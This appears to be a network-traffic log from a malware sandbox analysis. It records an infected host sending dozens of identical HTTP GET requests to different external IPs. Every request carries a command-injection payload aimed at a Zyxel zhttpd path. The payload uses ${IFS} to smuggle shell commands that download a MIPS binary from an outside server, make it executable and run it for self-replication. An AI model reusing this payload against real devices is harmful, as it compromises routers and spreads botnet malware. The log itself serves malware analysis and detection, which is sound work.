                                              Jan 29, 2024 07:03:53.073852062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5191192.168.2.1439246196.65.120.103443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.073895931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5192192.168.2.1458462179.215.38.196443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.073921919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5193192.168.2.1443234135.143.42.200443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.073956013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5194192.168.2.143795086.234.140.198443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.073999882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5195192.168.2.1448120208.70.39.168443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.074064016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5196192.168.2.1438988157.111.120.249443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.074090004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5197192.168.2.144473268.233.10.254443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.074137926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5198192.168.2.1454436187.128.9.223443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.074166059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5199192.168.2.1453426108.237.215.173443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.074203968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5200192.168.2.1455640178.66.54.33443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.074240923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5201192.168.2.1449672194.62.214.203443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.074301004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5202192.168.2.145780680.232.33.1443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.074328899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5203192.168.2.1442606115.150.50.127443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.074362040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5204192.168.2.1438848160.126.30.169443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.074409962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5205192.168.2.144957836.124.8.11443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.074440002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5206192.168.2.1442554194.236.228.238443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.074481010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5207192.168.2.144831282.245.98.98443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.074532986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5208192.168.2.144325475.159.83.49443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.074562073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5209192.168.2.1433584132.102.200.96443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.074600935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5210192.168.2.1453854222.13.79.42443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.074631929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5211192.168.2.1441766122.137.27.219443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.074666977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5212192.168.2.1455242143.151.3.130443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.074704885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5213192.168.2.1442088196.208.180.201443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.074729919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5214192.168.2.1446768187.159.207.86443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.074764967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5215192.168.2.144911490.173.166.250443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.074796915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5216192.168.2.143555069.131.222.23443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.074841976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5217192.168.2.1432770161.20.152.161443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.074868917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5218192.168.2.145634037.7.215.116443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.074928999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5219192.168.2.1460246134.22.173.131443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.074970961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5220192.168.2.1458130115.248.213.216443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.074996948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5221192.168.2.145104699.138.127.31443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.075052023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5222192.168.2.143746460.179.171.148443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.075093031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5223192.168.2.145071831.97.228.70443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.075125933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5224192.168.2.1436440208.68.209.78443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.075162888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5225192.168.2.1447774183.39.166.14443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.075206995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5226192.168.2.1446060205.67.136.83443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.075234890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5227192.168.2.1443004172.91.75.200443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.075268030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5228192.168.2.143277454.90.159.50443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.075310946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5229192.168.2.1456142129.81.191.28443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.075355053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5230192.168.2.1441816120.150.221.119443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.075390100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5231192.168.2.145938693.59.239.242443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.075417995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5232192.168.2.145652044.130.184.181443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.075474977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5233192.168.2.1460248140.195.212.137443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.075514078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5234192.168.2.144752684.171.219.62443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.075563908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5235192.168.2.1451358185.157.39.66443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.075581074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5236192.168.2.145287864.40.209.66443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.075630903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5237192.168.2.143986290.154.244.235443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.075664043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5238192.168.2.1444664202.199.230.88443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.075695992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5239192.168.2.144466875.60.119.187443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.075726032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5240192.168.2.1439704142.166.226.130443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.075778008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5241192.168.2.1452090200.246.102.14443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.075795889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5242192.168.2.1458236131.130.15.209443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.075839043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5243192.168.2.143829247.41.207.213443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.075890064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5244192.168.2.1459136152.198.172.117443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.075922012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5245192.168.2.1437282174.92.96.9443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.075953007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5246192.168.2.146096447.81.131.91443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.075980902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5247192.168.2.1460362106.197.235.193443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.076035976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5248192.168.2.1446834145.27.254.150443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.076091051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5249192.168.2.1458010206.142.253.143443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.076108932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5250192.168.2.1434032114.228.53.184443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.076129913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5251192.168.2.145591268.82.74.41443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.076191902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5252192.168.2.1453526205.173.165.210443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.076205969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5253192.168.2.1456986221.54.131.181443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.076256990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5254192.168.2.144548831.89.223.92443
                                              TimestampBytes transferredDirectionData
